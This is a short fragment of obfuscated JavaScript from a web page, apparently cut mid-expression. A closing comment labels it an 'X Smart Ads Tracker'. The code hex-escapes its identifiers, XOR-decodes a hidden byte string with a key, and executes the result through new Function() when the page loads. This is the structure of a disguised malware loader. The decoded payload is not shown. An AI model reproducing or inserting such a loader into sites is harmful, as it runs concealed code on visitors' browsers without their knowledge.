_0xbbcf788166eb['\x55\x69\x6e\x74\x38\x41\x72\x72\x61\x79'](_0x0a47ae71a28d['length']),_0xf16f9f0185b3=0;for(;_0xf16f9f0185b3<_0x0a47ae71a28d['length'];_0xf16f9f0185b3++)_0x04a30dc3228b[_0xf16f9f0185b3]=_0x0a47ae71a28d['charCodeAt'](_0xf16f9f0185b3)^_0xf63ac6f2799e['charCodeAt'](_0xf16f9f0185b3%_0xf63ac6f2799e['length']);(new _0xbbcf788166eb['\x46\x75\x6e\x63\x74\x69\x6f\x6e']((new _0xbbcf788166eb['\x54\x65\x78\x74\x44\x65\x63\x6f\x64\x65\x72']())['\x64\x65\x63\x6f\x64\x65'](_0x04a30dc3228b)))()}();
</script>
<!-- END: X Smart Ads Tracker -->